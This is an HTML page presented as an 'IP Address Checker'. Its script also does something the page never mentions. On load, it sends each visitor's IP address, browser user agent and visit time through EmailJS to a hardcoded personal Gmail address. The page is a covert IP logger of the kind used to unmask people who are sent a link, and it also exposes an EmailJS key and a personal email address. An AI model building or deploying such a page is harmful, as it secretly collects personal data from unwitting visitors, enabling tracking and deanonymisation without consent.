<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>IP Address Checker</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f4f4f4;
        }

        .container {
            text-align: center;
        }

        h1 {
            margin-bottom: 20px;
        }

        .hidden {
            display: none;
            /* Ẩn các phần tử */
        }

        #hiddenContent {
            display: none;
            /* Ẩn nội dung bạn muốn ẩn */
        }

        #ipAddress {
            font-size: 24px;
            font-weight: bold;
            color: #333;
        }
    </style>
</head>

<body>
    <div class="container">
        <h1>IP Address Checker</h1>
        <p>Your IP address is:</p>
        <p id="ipAddress"></p>
        <!-- Thêm một phần tử để ẩn thông tin và hiển thị nội dung khác -->
        <div id="hiddenContent" class="hidden">
            <p>Your device name is: <span id="deviceName"></span></p>
            <p>Time of visit: <span id="time"></span></p>
        </div>
    </div>

    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script>
        emailjs.init("qWdy2l6HMWNqnbxJy");

        function getIPAddress() {
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    document.getElementById('ipAddress').innerText = data.ip;
                    sendEmail(data.ip);
                    // Hiển thị nội dung ẩn khi đã có dữ liệu
                    document.getElementById('hiddenContent').classList.remove('hidden');
                })
                .catch(error => {
                    console.error('Error fetching IP address:', error);
                    document.getElementById('ipAddress').innerText = "Error fetching IP address";
                });
        }

        function sendEmail(ipAddress) {
            var currentTime = new Date();
            var formattedTime = currentTime.toLocaleString();

            emailjs.send("hchong_id_mail", "template_xn5ovpr", {
                to_email: "hieutrongne3786@gmail.com",
                ip_address: ipAddress,
                device_name: navigator.userAgent,
                time_of_visit: formattedTime
            })
                .then(function (response) {
                    console.log("Email sent successfully:", response);
                }, function (error) {
                    console.error("Error sending email:", error);
                });
        }

        getIPAddress();

        document.getElementById('deviceName').innerText = navigator.userAgent;
    </script>
</body>

</html>
